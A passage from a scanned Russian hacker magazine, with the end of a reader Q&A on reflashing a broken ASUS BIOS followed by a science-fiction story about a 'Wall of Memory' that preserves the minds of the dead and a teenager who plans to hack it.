гарантии! Плиз, ответьте, на вас вся надежда! Заранее благодарен! 


ОТВЕТ: 

Не понимаю, что общего у редакции Х$ с полетевшим 
BUOC'om! Требует он потому, что ты прошил кривой 
образ, не соответствующий размеру флешки. Как ты ее 
прошивал, мне неведомо, но подозреваю, что не «awd- 
flash.exe filename.bin», а как-то хитрее. Раздобыть файл 
можно, только он тебе уже не поможет. Затусуйся в 
свою гарантийную мастерскую, и как поется в 
бессмертной «Сифилиаде»: «И у окошка в кабинете, 
подъемля взоры в небеса, ты будешь клясться, что 
бывают на свете все же чудеса». Вернее, гнать про то, 
что сломалось само, не советую :), поскольку кривые и 
шаловливые руки видно по глазам, но много денег взять 
не должны. Но сам лучше ничего не делай, ты уже все 
что мог, сделал. 

Совет от AvaLANche'a: Тебе нужно заново прошить 
BIOS, причем прошить нормально. Все необходимое для 
этого есть на сайте ASUS'a (www.asus.com.tw). Дискету 
требует в надежде, что на ней будет лежать программа- 
прошивальщик (awdflash.exe) и корректный образ BIOS. 


Niro (niro@real.xakep.ru) 


SPECIAL 
ACCESS ONLY 
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- Ваша фамилия? 

- Вербицкий. 

- Вы опоздали. 

- Бывает... 

- Сюда не принято опазды- 
вать. 

- Прошу прощения. 

- Богс вами, юноша. Прохо- 
дите. Сколько еще раз в своей 
жизни вы опоздаете на гораздо 
более важные мероприятия... Хо- 
тя по мне, так куда уж важнее. 

Парень, с которым через открытую наполовину дверь разговаривал чело- 
век в сером строгом костюме, перешагнул порог и оказался внутри. 

Он был здесь впервые. Вчера ему исполнилось шестнадцать лет; бурный 
праздник отгремел в квартире в присутствии большого числа друзей по шко- 
ле и родительских приятелей. Он впервые в жизни попробовал вчера шампа- 
нское (хотя тайком от родителей уже пил пиво, и не раз). Утром мать подняла 
его достаточно рано, напомнив о святой обязанности каждого, кто переходит 
отметку «шестнадцать» - он просто не мог опоздать, но, едва надев брюки, 
он плюхнулся в кресло за компьютером, чтобы проверить почту на наличие в 
ней поздравлений от тех, кто жил в других часовых поясах. Почты было мно- 
го — вычистив весь спам, он принялся разгребать пожелания и похвалы, 
наткнулся на несколько интересных ссылок, присланных вместо подарков.. 
Короче, он завис намертво и очнулся только тогда, когда мать, посчитавшая, 
что он уже ушел, застукала его за этим занятием. 

Крику было! Она вытолкала его в коридор, кинув следом куртку и даже не 
обратив внимания на то, что он не успел надеть рубашку. Короче, выглядел 
он, войдя в кабинет, достаточно глупо - джинса на голое тело, взъерошенные 
волосы, виноватый взгляд. Но человек, принявший его, сделал вид, что не 
замечает кое-какие странности в одежде; ему указали на стул, попросили 
предъявить паспорт (как удачно, что он оказался в кармане куртки, мама пос- 
таралась!) 

- Алексей? 

Вербицкий кивнул, разглядывая интерьер незнакомого помещения. 

- Вы знаете, зачем вы здесь? 

- Да. Правда, только понаслышке... 

Что-то ему здесь не нравилось. Он представлял себе все иначе — он был 
уверен, что все это будет больше напоминать больницу, нежели офис. Его 
просто обязаны были встретить люди в белых халатах, взять какие-то анали- 
зы, ощупывать его со всех сторон, посчитать пульс, измерить давление... А 
еще — этого он боялся — спросить: «Вчера употребляли алкоголь?» Но потом 
он вспомнил, что бокал шампанского ему налила своей рукой мама, и поду- 
мал, что уж она-то в точности должна была знать все условия. 

Человек кое-что просмотрел на компьютере, оторвал взгляд от экрана и 
посмотрел на Вербицкого. 

- Вы что, волнуетесь? 

- Честно? Да. 

- Почему? 

- Ну, знаете... 

- Понятно. Вы, наверное, представляли себе это как визит к врачу. Что 
обязательно будет больно, неприятно, какие-то иглы, пробирки, присоски, 
контакты... 

Алексей смутился оттого, что человек угадал его мысли с поразительной 
точностью. 

- Вы покраснели, Вербицкий. Видимо, я угадал. 

- Да. 

- Знаете, почему? Потому что на десять молчаливо боящихся есть всегда 
один разговорчивый. И эти разговорчивые всегда говорят одно и то же — 
когда приходят сюда в первый раз. Вот уже потом, когда все известно... 
Многие ругаются, торопят меня и моих помощников, некоторые крайне рав- 
нодушны — но вот в первый раз все БОЯТСЯ. И правильно. 

- Почему? 

- Вы не поймете, - человек клацнул парой клавиш, продолжая смотреть в 
глаза Алексея. — И, мне кажется, пора начинать. Не переживайте, больно вам 
не будет. Процедура займет всего три-четыре минуты — и это еще самая 
длинная; каждый последующий раз все будет еще быстрее... 

Алексей поднялся со стула, огляделся по сторонам, не зная, что делать и 
куда идти. 

- Не надо вскакивать, молодой человек. Вы, отягощенный кибернетичес- 
ким веком хай-тека, ожидаете увидеть здесь что-то вроде огромного компью- 
терного томографа, в который вас погрузят, как в горнило печи. Ну почему 
всегда именно так? 

Вербицкий пожал плечами. Ему нечего было сказать. 


Человек встал и указал Вербицкому на дверь. Они вышли в коридор, 
прошли по нему несколько поворотов, не встретив никого на своем пути. 

- Обычно народу здесь больше, - не оборачиваясь, сказал Алексею соп- 
ровождающий. — Но на все есть теория вероятностей. Просто вчера дней 
рождения было не так много... 

Вербицкий кивнул. Внезапно они остановились — коридор кончился 
дверью с кривой надписью на листе бумаги, приколотом канцелярской кноп- 
кой - «Разгрузочная площадка». Человек хмыкнул, сорвал листок и, скомкав 
его, сунул в карман. 

- В чем-то они правы, - обернулся он к Алексею. — Груз шестнадцати лет 
как, не давит на плечи? 

Вербицкий замотал головой и облизал пересохшие губы. А потом они 
ВОШЛИ... 


ххх 


Брагин снял очки, потер переносицу. Все было напрасно. Ответа не пос- 
ледовало. 

- И спрашивается, зачем тогда все? 

Он огляделся, увидел рядом с собой еще несколько человек в черных оч- 
ках, которые шевелили губами, разглядывая то, что видели. Все-таки со сто- 
роны это всегда выглядело достаточно глупо... 

- Как же быть? — отойдя от стены и присев на одну из резных скамеек, 
сам себя спросил Брагин. — Только Данила мог решить эту проблему. Он 
ведь и начал первый, и продвинулся дальше всех... И ушел первым. 

Достав сигарету, Брагин закурил, совершенно не чувствуя вкуса и запаха 
табака. Погода была не ахти, собирался дождь; люди у стены, продолжая 
разговаривать с невидимыми собеседниками, наощупь искали в сумках зон- 
тики. Зябко передернув плечами, Брагин вспомнил, что сам он, скорее всего, 
попадет под ливень — зонтик остался дома; он очень торопился сюда, в оче- 
редной представив, как Данила ответит на его вопрос... 


- Понятно. Вы, наверное, 
преоставляли себе 
это как визит к врачу. 


Недаром считается, что в вопросе всегда содержится половина ответа — 
вот и Брагин наполовину разобрался в ситуации. Но только наполовину. Не- 
достающую часть должен был назвать Данила. Ну, если не назвать, то хотя 
бы намекнуть. Просто указать направление. 

Все оказалось бесполезно. То, что говорил Данила, было совершенно не- 
интересно Брагину. Какая-то чушь про погоду, про родителей; спросил кое- 
что из новостей высоких технологий, потом полез в политику. 

Брагин смотрел на него, не имея сил остановить. Данила просто должен 
был поговорить, хотя, насколько известно, при непосредственном общении 
обновления памяти не происходит — все здесь делается централизованно, в 
зависимости от групп по интересам. Получался заколдованный круг — инфор- 
мация, нужная Брагину, на свет не появлялась, уйти он не мог хотя бы из 
вежливости, а любое его слово лишь подстегивало Данилу продолжать бол- 
тать ни о чем. 

Можно было, конечно, просто снять очки, сделать вид, что с ними что-то 
случилось — чтобы произошло отключение. При отсутствии контакта с одной 
стороны вторая автоматически прекращала обмен данными. Но Брагин всег- 
да боялся подобного варианта — он думал, что все-таки где-то там, в глубине 
всей этой махины, несмотря на то что база закрыта для записи, отпечатается 
его невежливый поступок, и в следующий раз от Данилы вообще не будет 
никакой пользы. 

А ведь если у них не получится — значит, не получится ни у кого. 

- Черт!.. — отшвырнул окурок в сторону Брагин, поднялся со скамейки и 
решительно подошел к стене. — Ведь он же знал ответ, я уверен! 

Он засунул руку в карман, уже собираясь надеть очки, чтобы более реши- 
тельно и настойчиво спрашивать Данилу, но что-то его остановило. Никогда 
еще он не делал этого больше одного раза в неделю, а уж на два раза в день 
у него точно не хватит душевных сил. 

- Хорошо, - сказал Брагин вслух. — Я еще приду. Пока у меня есть кое- 
что, о чем не знают ребята. Сделаю вид, что это мне сообщил Данила. Тем 
более что я вычитал это в его дневнике... Немного подправил, кое-что в кор- 
не изменил. Все-таки он был гений... Ведь судя по почерку, он записал все 
это одномоментно — и сделал только две ошибки, причем абсолютно не кри- 
тические, так, мелочь. Вот только после всего того, что случилось, прошло 
уже почти полгода; ситуация несколько изменилась — поэтому пришлось вно- 
сить коррективы. » 
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Он помнил, что рука у него поднялась He сразу. Править исходники Дани- 
лы было для него кощунством невиданной силы; все равно что пытаться ис- 
кать ошибки в Библии. Он несколько раз советовался с друзьями; все вместе 
они пришли к выводу, что, если программа, написанная Данилой, заработа- 
ет, пусть даже и в исправленном варианте, это все-таки лучше, чем сделать 
из нее икону и превратить в бесполезный груз. 

Сегодня в разговоре он не упомянул об этом ни разу. Он будто бы боял- 
CA потревожить какие-то струны души Данилы... 

- Но ведь там нет никакой души, - сказал Брагин и пожал плечами. — По- 
лучается так: я все прекрасно понимаю, и все равно веду себя глупо. 

Он вспомнил, как впервые оказался здесь полгода назад, как первый раз 
поздоровался и услышал в ответ такое знакомое «хай, бледнолицый...»; 
вспомнил, как Данила улыбнулся ему, словно они расстались только лишь 
вчера. 

- Просто много времени утекло, - философски заметил Брагин, почув- 
ствовал на своем лице первые капли холодного осеннего дождя, сунул руки в 
карманы и, втянув голову в плечи, пошел к автобусной остановке. 

В спину ему смотрела большая фотография Данилы, вырезанная в камне, 
темными плитами покрывающем Стену Памяти на высоту трехэтажного дома. 
«Данила Строгин. 1979-2007». Прищуренный взгляд, аккуратно зачесанные 
волосы, легкий наклон головы. 

А на пять сантиметров выше волос — маленький глазок голографической 
камеры. 


жжххх 


Вербицкому указали на кресло — самое обыкновенное кресло, безо вся- 
ких проводов, датчиков, мониторов и подобной фантастической шелухи, на- 
веянной голливудскими триллерами. Он сел, настороженно вертя головой во 
все стороны, но не нашел в этой комнате ничего необычного — хотя уже в 
этом и была необычность. 


Петля удобно устроилась на 

ушной раковине, какие-то то- 

ненькие иголочки впились в 
кожу виска. 


Ничего, кроме кондиционера под потолком и стола с ноутбуком в центре. 
Кондиционеру надо было отдать должное — такой свежести Алексей, всю 
жизнь проживший в мегаполисе, не мог даже вспомнить. Воздух был невооб- 
разимо чист, мягок, приятен... 

- Нравится? — спросил человек, приведший его сюда, заметив, как Вер- 
бицкий дышит полной грудью. — Свежесть пополам со стерильностью. Здесь 
еще есть бактерицидные лампы невидимого спектра, так что за зрение мож- 
но не бояться... 

- Для чего все это - стерильность, чистый воздух? - спросил Алексей. — 
Может, еще протереть меня спиртом? 

- Не надо нести чепухи, молодой человек, - недовольно ответили Вер- 
бицкому. — Это, как минимум, приятно тем, кто здесь работает. А вообще, 
условия эксперимента таковы, чтобы между мной, вами и программой не бы- 
ло ничего лишнего. Вдруг во время снятия матрицы к вам в ноздрю нырнет 
вирус гриппа, вы чихнете, контакт нарушится. И что мы получим на выходе? 

- Что? 

- Вот именно — что... Ничего хорошего. 

- То есть здесь все ради того, чтобы я не чихнул? — удивился Вербицкий, 
услышав подобный комментарий. 

- Ни вкоей мере не принижайте значения всех предметов, что вы видите 
здесь, и всего того, что работает на вас и для вас, будучи скрытым в стенах, 
потолке и полу. 

Алексей скорчил удивленную гримасу, осмотрел комнату; понимающе, 
как-то по-шпионски, кивнул и сказал: 

- Я готов. 

Человек кивнул ему в ответ, подкатил кресло с Алексеем к столу, включил 
ноутбук, вынул из ящика под столешницей какие-то разноцветные провода, 
воткнул штекеры в плохо заметные Алексею отверстия в ней, после чего еще 
раз спросил: 

- Вы готовы? Тогда положите на стол правую руку. 

Вербицкий сделал то, о чем его просили. На указательный палец прице- 
пилась какая-то штука типа датчика. 

- Теперь просто наденьте это на левое ухо, - человек протянул Алексею 
приспособление, напоминающую гарнитуру для сотового телефона. Петля 
удобно устроилась на ушной раковине, какие-то тоненькие иголочки впились 
в кожу виска. 
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Вербицкий вздрогнул, но его тут же успокоили: 

- Это устройство не причинит вам вреда, даже следа от уколов не оста- 
нется. Да и вообще, я очень сомневаюсь в том, что вам было больно. Ско- 
рее, дело в неожиданности. 

Алексей согласился. Слегка прикоснулся к этой штуке в ухе, ожидая, что 
она, словно паук, зашевелится. Ничего подобного не случилось; он оконча- 
тельно успокоился и откинулся в кресле. 

- Вот и хорошо, - кивнул человек. — Сама процедура никаких ощущений 
не принесет. Вы даже не поймете, когда она начнется и закончится. Может 
быть, она уже началась... 

Вербицкий прислушался к своим ощущениям и вдруг услышал тонкий 
свист. Что-то очень знакомое... Черт, что же это может быть?! 

Человек напротив внимательно смотрел в экран ноутбука и держал палец 
над клавиатурой. Свист не менялся в тональности, ничего не происходило. 

Вербицкий скосил глаза к левому уху, но, само собой, ничего там не уви- 
дел. Короче, все это напоминало какую-то хорошую аферу. 

Внезапно свист прекратился. Человек опустил палец на клавиатуру, из 
ноутбука выдвинулся лоток, и Алексей наконец-то вспомнил, что это был за 
звук. 

Звук свиста О\/О-привода. Данные уже были в компе и писались напря- 
мую на болванку. Странный способ хранения информации в такой мегакор- 
порации. 

- Уже все? — спросил Алексей, поднимая руку к голове. 

- Да. Аккуратно потяните это устройство за два выступа сверху и снизу... 

Алексей взялся за электронного «клеща», почувствовал под пальцами ма- 
ленькие кнопочки, сжал. Спустя мгновенье эта штука была у него в руках. Он 
внимательно рассмотрел ее, но не нашел ничего похожего на те иголочки, 
что покалывали ему кожу возле виска. 

Тем временем человек взял с лотка диск, нацепил его на палец и рас- 
смотрел свое в нем отражение. Поправив волосы на голове, он внимательно 
взглянул на молчаливого Вербицкого и сказал, кивнув на диск: 

- Вот они, молодой человек, шестнадцать лет вашей жизни. Скажите 
«спасибо». 

- Спасибо... А за что? 

- Вот в том и дело, что никто, глядя на эти диски, не понимает, в чем их 
смысл, - горестно вздохнул человек. — Ведь они приобретают истинную цен- 
ность только после вашей смерти. Надеюсь, что до нее еще очень и очень 
далеко. Жду вас здесь, в этой самой комнате, через год — если вы сами не 
захотите раньше. Но в этом случае это будет стоить денег, ибо выходит за 
рамки государственной программы. Правда, иногда находятся люди, готовые 
делать это каждый день. Но поверьте мне, это какая-то идиотская крайность, 
совершенно ненужная и не оправдывающая себе. Ведь здесь все-таки не ре- 
зервное копирование — это гораздо, гораздо более впечатляющее действие! 
Кстати, если уж вы не захотите у нас больше появляться, это, опять же, ваше 
полное право. 

Казалось, он был чертовски горд тем, что держит сейчас на пальце шест- 
надцать лет жизни Алексея Вербицкого, словно не Алексей, а он сам прожил 
их за него. Толкнув пальцем лоток и закрыв какие-то программы, он выклю- 
чил компьютер, не выпуская диск из руки, после чего предложил Вербицкому 
пройти на выход. 

Они оказались в том же коридоре, по которому пришли сюда. Вот только 
теперь одна из дверей была открыта — напротив комнаты, в которой снима- 
лась информация. Человек направился прямо туда, жестом остановив Алек- 
сея на пороге. 

Но тот все-таки сумел заглянуть внутрь — пусть краем глаза, но он разг- 
лядел кое-что. 

Четыре человека. Четыре монитора. Масса аппаратуры. Огромные стел- 
лажи, напоминающие гигантские чейнджеры для компакт-дисков. В углу — 
большой стол, заставленный посудой; немытые тарелки, чашки с дымящимся 
кофе, несколько коробок из-под пиццы под столом. 

Одни из операторов, не оборачиваясь, протянул руку за спину и взял 
диск с жизнью Вербицкого. Алексей даже вздрогнул, когда из дверей увидел, 
как жирные от пиццы пальцы оставляли на его диске следы. Это было самым 
неприятным впечатлением от всего посещения. Он отшатнулся от двери в ко- 
ридор и принялся разглядывать стены. 

Тем временем человек, передав диск, вышел обратно к Алексею и жес- 
том предложил ему идти на выход. Вербицкий опустил глаза в пол и напра- 
вился следом, видя только ковровую дорожку. 

У самых дверей он остановился и внезапно спросил: 

- Скажите, а там, на диске, можно что-нибудь изменить? Ну, стереть, до- 
бавить... Исправить... 

- Нет, - услышал он в ответ. — Жизнь — такая штука, что... Короче, рихто- 
вать можно только автомобили. А диск — сохранит все, как оно есть. Всю 
правду. Поверьте, это не так уж и плохо. 


Вербицкий вздохнул, распахнул дверь и вышел на улицу, под моросящий 
осенний дождик. Перед глазами все время стояла его жизнь, заляпанная 
жирными пальцами... 
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Брагин не смог промолчать. Совесть, этот неумолимый и неподкупный 
сторож, заставила его признаться. Ребята были не то что бы в шоке, но энту- 
зиазма поубавилось примерно наполовину. 

- Короче, это все - один большой обман. То есть, нет, конечно, не обман 
— это был самый что ни на есть настоящий Данила, так хотелось руку протя- 
нуть, - Брагин стоял перед всеми своими собратьями по оружию, словно на 
докладе. — Но толку от нашей с ним беседы не было никакой. И, знаете, ме- 
ня посетила мысль о том, что все это — просто подделка для слишком впе- 
чатлительных и сентиментальных людей. Место, куда можно придти и просто 
пустить слезу, если уж очень хочется. 

- Насколько я знаю, Стена Памяти дает ответы, - вставил слово Роман, 
самый молодой среди них. — По крайней мере, я слышал... 

- Слышал? От кого? — остановил свой взгляд на нем Брагин. — От тех, 
кто тоже от кого-то слышал? Я поднял статистику — никто не может привести 
сколько-нибудь значимый факт того, что Стена дала реальный ответ, лишь 
какие-то общие советы и возможность пообщаться на уровне давно забытого 
прошлого. И это несмотря на то что нас постоянно уверяют, что база обнов- 
ляется! 

- А разве нет? — спросил кто-то из-за спины. 

- Не знаю, - опустил глаза Брагин. — Все мы живем, принимая существо- 
вание Стены Памяти как должное... Мы верим во все, что говорится о ней. 
Каждый из нас проходил процедуру снятия матрицы. Некоторые уже по два и 
три раза... - он имел в виду себя. 

- Короче, хватит этой лирики, - Роман встал со стула, подошел к Брагину 
в центре компании, словно пытаясь стать ее новым центром. — Надо продол- 
жать работать. Вы же знаете, что у нас получается — пусть медленно, но по- 
лучается... 

- НАМ НЕЛЬЗЯ ДВИГАТЬСЯ МЕДЛЕННО, - повернулся к нему лицом Бра- 
гин. — Слишком велика цена. Слишком. 

Он вышел из центра компании и вошел в комнату, которую они называли 
Центром. Несколько компьютеров, множество мониторов, отображающих 
разную информацию в виде столбцов цифр, графиков, разноцветных диаг- 
рамм; присев в кресло за одним из компьютеров, Брагин опустил голову на 
руки, закрыл глаза и задумался. 

Они объединились в группу в 2001 году, за несколько месяцев до амери- 
канской трагедии, когда их всех собрал один очень высокопоставленный чин 
из Федеральной службы безопасности. Все имели грехи перед законом, все 
они когда-то попались на удочку и были «законсервированы» - у тех, кто пой- 
мал их всех, хватило ума отправить этих талантливых людей не на тюремные 
нары, а в резерв, пусть и под угрозой потери свободы. 

Знакомили их друг с другом постепенно — подбирая психологические па- 
ры, дополняя знания одних наглостью других. В итоге получилась практичес- 
ки идеальная группа, способная на любое проникновение в сколь угодно за- 
щищенную компьютерную систему — вот только сколько-нибудь значимой 
работы для них до поры до времени не было. Пока не случилось то, что слу- 
чилось... 

Когда мир изменился, рухнув вместе с башнями Нью-Йорка, стало ясно, 
что война пойдет на всех фронтах, в том числе и в сети. Хакеры, купленные 
ваххабитами, проводили удачные атаки на мирные структуры. Пропадали 
данные, исчезали тонны валюты, гибли люди. Несли убытки гигантские кор- 
порации — гибли авиакомпании, вырождался туристический бизнес; у людей 
пропадала вера в надежность окружающего мира и систем безопасности. 

Компьютерная война приобретала тотальные размеры. Имеющиеся сред- 
ства защиты не справлялись с ней; специалистов не хватало; нападения слу- 
чались одно за другим. Попытки уничтожить центры компьютерного злодей- 
ства физически успехов не приносили — точечные ракетные удары оказались 
способны выключить из этого процесса лишь два процента баз и несколько 
сотен хакеров, остальные перешли на нелегальное положение и продолжали 
свою грязную работу, подпитываемые деньгами со всего мира. 

С каждым днем у них получалось все лучше и лучше — атаки следовали 
одна за другой, достоянием террористов становилась секретная информа- 
ция; попытки опередить их ни к чему не приводили. Там, где властвовала 
идеология доллара, нечего было противопоставить — таков уж был жестокий 
двадцать первый век. 

И тогда было принято решение — попытаться отследить все денежные 
перемещения террористов, чтобы в один прекрасный момент сделать их ни- 
щими. Потихоньку изучить все финансовые следы преступлений, накопить 
побольше информации — и сделать ответный выпад. Система просто обязана 
была рухнуть, лишившись денежных поступлений — ведь те миллиарды дол- 


ларов, что циркулировали между заказчиками и исполнителями, нельзя было 
восстановить в один день; ну, а после такой атаки предполагалось нанести 
удар и по самим заказчикам. 

Подготовка шла по двум направлениям: собиралась группа хакеров, не- 
обходимая для вычисления и переключения денежных потоков, и формиро- 
валась группа спецназа, целью которой являлось физическое устранение лю- 
дей. Бессмысленно было готовить операцию против исполнителей — пока 
есть деньги и есть кого покупать, война не прекратится. Поэтому Служба Бе- 
зопасности решила сыграть по-крупному, сделав самую большую ставку. 

Группой хакеров руководил Данила Строгин. Человек, безусловно, тала- 
нтливый, упрямый и принципиальный. Он возглавил группу, начинил мозги 
каждого из ее участников своими идеями, указал фронт работ. И они стали 
одерживать маленькие победы — правда, сражения на невидимом фронте 
пока не озвучивались нигде, только в скупых отчетах Службы Безопасности. 
Они собрали массу информации о том, как, куда и когда направляются де- 
нежные потоки на поддержание в мире нестабильности и атмосферы страха. 
В их базе данных было огромное число банковских счетов с реквизитами, па- 
ролями, адресами. Они ждали только команды... 

Когда уже стало ясно, что все материалы собраны и необходима лишь 
согласованная работа хакеров и спецназа, чтобы совместить во времени ра- 
боту по перекачиванию денег с устранением заказчиков, когда дело было 
только за сигнальной ракетой — что-то там не заладилось в огромной кибер- 
машине спецслужб, кто-то атаковал группу Строгина, причем довольно удач- 
но, похоронив результат их работы за последние две-три недели. Вряд ли 
это делалось по чьей-то наводке, скорее, досадная случайность столкнула 
террористов с хакерами раньше времени — но факт остается фактом, атаку 
пришлось отложить. 

Тот, кто делал свое грязное дело, не зациклился на достигнутом. Война 
на мгновенье перенеслась из мира виртуального в мир реальньй, и пуля кил- 
лера остановила сердце Данилы. Группа лишилась лидера и его умений, та- 


Люди приходили к Стене Памяти, 
где в высокую длинную гранитную 


могилу были вставлены тысячи 6.9 


урн с фотографиями и надписями. 


ланта. И, как выяснилось, оставшиеся в живых были не готовы выполнить за- 
думанное — часть плана Данила унес с собой в могилу. 

Брагин уже четыре раза ходил к Стене Памяти. Того, что он вычитал в 
дневнике Строгина, не хватало для завершения работы. 


жхххх 


- Ну, наконец-то, - распахнула перед ним дверь мама и сняла с него 
насквозь промокшую куртку. — Ты где пропадал, да еще под дождем? 

Вербицкий не ответил, прошел мимо нее к себе в комнату и сел на кро- 
вать. 

- Ты чего? — мама встала в дверях, прислонившись к косяку. 

Алексей пожал плечами. 

- И это все? - поднял он на нее глаза. 

- Ачего ты ожидал? 

Он снова пожал плечами. 

- Кто это придумал? 

- Ты прекрасно все знаешь не хуже меня, - покачала головой мать. — Те- 
бя что-то там очень сильно впечатлило? Ну, в первый раз с каждым может 
быть... 

- Сколько раз ты там уже была, ма? 

- Три, Алексей, - она подошла поближе, опустилась на кровать. — Я чего- 
то не понимаю... 

- Мам, а есть люди, которые не делают этого? 

- Конечно. Если есть правила, есть и исключения. Но, мне кажется, те, 
кто не пускает в свои мозги эту штуку на ухе, очень и очень ошибаются. Все- 
таки оставить след в жизни можно и подобным образом... 

Алексей кивнул, встал, подошел к компьютеру. Где-то в недрах гиган- 
тского хранилища лежит сейчас его жизнь, его шестнадцать лет... 

Это началось четыре года назад, когда был создан первый в мире вирту- 
альный крематорий. Виртуальный — не в смысле симулятор: трубы там ды- 
мили по-настоящему, печи перерабатывали тела людей в пепел, на выходе 
выдавались урны с прахом усопших. Но вот только все они, или почти все, 
если уж быть точным, с некоторого момента оставались доступными для об- 
щения. Сложно сказать, как долго обсуждался моральный аспект проблемы - 
каково видеть своих покойных родственников, разговаривать с ними, будто с 
ЖИВЫМИ... » 
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Изобретатели всего этого, группа российских ученых, работавших над 
тайнами мозга, получили чуть ли не всем коллективом Нобелевскую премию 
и стали первыми, чьи матрицы сознания были сняты для пробных исследова- 
ний. Суть изобретения заключалась в следующем. 

У человека при жизни снимались «слепки сознания», хранящие в себе все 
события, случившиеся за определенный период времени — год они посчита- 
ли достаточным периодом для обновления базы данных. Первый сеанс уче- 
ные рекомендовали производить в четырнадцать лет, но законодательные 
органы по каким-то причинам вступили с ними в пререкания, и он был пере- 
несен на шестнадцать лет. 

Из этих «слепков» формировалась матрица. Образ человека, доступный 
для общения. Камера проецировала лицо, с точностью имитировался голос, 
манера разговора. С этим образом можно было говорить о чем угодно. Мож- 
но было просто посмотреть на того, кто был тебе дорог, рассказать ему о се- 
бе, о том, что творится в мире, спросить о чем-нибудь, получить совет, подс- 
казку, утешение... 

Похоже на сказку. Но сказка работала. Вторым звеном в этой системе 
была компьютерная поддержка. Всем этим голографическим чудом управля- 
ла самая мощная в мире система управления искусственным разумом. Сотни 
программистов создавали ее, десятки людей обслуживали сервер кремато- 
рия и Стены Памяти. Самая большая в мире база данных, содержащая в нас- 
тоящий момент несколько десятков миллионов записей людей разных воз- 
растов, профессий, вероисповеданий, увлечений. Десятки миллионов... 

Люди приходили к Стене Памяти, туда, где в высокую длинную гранит- 
ную могилу были вставлены сотни, тысячи урн с фотографиями и надписями. 
Они надевали специальные очки, настроенные только на их канал — подслу- 
шать и подсмотреть этот диалог с мертвыми не мог никто. Едва очки каса- 
лись переносицы, камера включалась и в воздухе появлялось трехмерное, 
никак не отличимое от настоящего, изображение головы. И разговор начи- 
нался... 


Алексей чертыхнулся в 
очередной раз, закрыл все это 
барахло и задумался. 


Людей, которые шли на такие свидания впервые, консультировали психо- 
логи. Не все были в состоянии вынести подобные потрясения, не у всех хва- 
тало выдержки и нервов на то, чтобы беселовать с теми, кого собственными 
руками клали в гроб или провожали в крематории в жерло печи. 

Постепенно это стало неотьемлемой частью жизни. Пока Стена Памяти 
была доступна только жителям столицы, но в скором времени их могло стать 
больше, гораздо больше. 

Каждый день в базу данных добавлялись умершие в этот день люди; каж- 
дый день те, чьи данные хранились на дисках сервера посмертно, обновляли 
свои секторы памяти за счет специальной программы, вносившей корректи- 
вы исходя из новостей, случившихся в мире. Придя к своим родным, можно 
было не удивляться тому, что они в курсе дел, творящихся вокруг. Люди, чья 
жизнь прервалась один-два года назад, совершенно спокойно поддерживали 
разговор о том, что случилось вчера или позавчера. 

Правда, приписать к матрице данные было можно, изменить существую- 
щие — нельзя. Нельзя было исправить прошлое, нельзя было изменить ниче- 
го. Прожитая жизнь светилась в глазах виртуальных мертвецов такая, какая 
она была. 

Было и еще одно «но», известное только очень узкому кругу людей, заня- 
тых управлением искусственным интеллектом Стены Памяти — любая дест- 
руктивная информация, записанная в слепок сознания, немедленно оттуда 
извлекалась и использовалась определенным образом. Именно поэтому 
практически весь криминальный мир избегал процедуры снятия «слепка соз- 
нания» (благо, сама процедура была далеко не принудительная) после ряда 
совершенно необъяснимых арестов, имевших место практически на следую- 
щий день после записи, когда матрицы некоторых людей были просмотрены 
специалистами. Факт был ничем не подтвержден, но наталкивал на опреде- 
ленного рода размышления. 

Подобным образом был вычищен от компьютерных знаний мозг Данилы 
Строгина — именно поэтому разговор с ним напоминал Брагину общение с 
умалишенным, поскольку все его вопросы, касающиеся работы на Службу 
безопасности, оставались без ответа. Узнать у Данилы что-либо было невоз- 
можно. Но Брагин не имел об этом понятия. 

И только поэтому он собрался идти к Стене Памяти в пятый раз. На сле- 
дующий день после того, как у Алексея Вербицкого сняли первый «слепок 
сознания». 
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Алексей стоял на балконе, опершись на перила, и разглядывая людей, 
идущих по своим делам. В голове роилась куча мыслей, и практически все 
они были направлены на эту процедуру, случившуюся с ним вчера утром; он 
пытался представить себе, как где-то в недрах сервера лежит одним боль- 
шим файлом его жизнь, ожидая его смерти. 

- То есть, если я вдруг завтра умру, то навеки останусь шестнадцатилет- 
ним, моя мама будет приходить к Стене Памяти и разговаривать со мной та- 
ким, каков я сейчас? — задал он сам себе вопрос, распрямившись и взглянув 
в небо, затянутое со вчерашнего дня тучами. — И она узнает... черт возьми, 
она про все узнает! 

Он рванулся в комнату, захлопнув за собой балконную дверь. 

- Какой ужас! — обхватил он голову руками. — Конечно, мне уже будет 
все равно, но мама... 

И перед его глазами встали все его мальчишеские подвиги, которые вче- 
ра легли тонкими дорожками на диск — сигареты, пиво, девчонки, кардер- 
ство, один раз попробовал марихуану (маме хватит и одного раза - еще возь- 
мет и спросит), отравил соседскую собаку, правда, за дело: псина покусала 
маленького пацана на площадке, а хозяин слишком много выступал в защиту 
этого зубастого урода... 

На лбу выступил холодный пот, рука сама включила компьютер. С полки 
были извлечены несколько умных книжек по удаленному доступу, подшивка 
старых «Хакеров». Самыми сильными стимулами для Вербицкого оказались 
стыд и страх. 

Он быстро просмотрел в интернете все, что только мог найти о Стене Па- 
мяти — доступной информации было довольно много, но практически вся она 
касалась лишь моральной стороны дела, несколько документов было посвя- 
щено группе изобретателей, пара страниц поведала о нескольких запечат- 
ленных в Стене личностях выдающихся людей, ушедших из жизни за послед- 
ние три года. 

Алексей чертыхнулся в очередной раз, закрыл все это барахло и задумал- 
ся. Чего он хотел на самом деле? Пробиться на сервер Стены, найти свой 
файл и уничтожить его? Просто испугавшись, что через много лет его дети, 
решив разузнать, чем занимался в детстве их папаша, узнают, что он не 
очень хорошо учился, бил стекла в школе, ставил подножки девчонкам и исп- 
равлял оценки в классном журнале, получив к нему доступ со школьного 
компьютера? А что будет через год? Он придет на процедуру обновления, а 
что обновлять-то? Правда, можно устроить скандал, попытаться выяснить, ку- 
да же они похоронили его шестнадцать лет жизни, какого черта, что здесь за 
организация, Маши-растеряши какие-то! 

- Но тогда они просто повторят первичное снятие «слепка», - сам себе 
ответил Алексей. — Уже с какими-нибудь новыми приколами, так как за год с 
моим характером и желанием искать приключения на свою голову их набе- 
рется предостаточно, в том числе и это... Да, елки-палки, ведь информация о 
том, как я грохнул свою матрицу, тоже будет на диске, который запишут че- 
рез год! Какой-то заколдованный круг... 

- Чего сидеть? Делать надо, - сказал он сам себе, пододвинул листок бу- 
маги и принялся набрасывать план. 

Поначалу все вроде было как обычно. Получить права с самым высоким 
уровнем привилегий у него не получилось, да на это он не рассчитывал с са- 
мого начала. В своих раздумьях он пришел к выводу, что все, что ему нужно, 
— это попытаться определить, по какому принципу файлам-матрицам прис- 
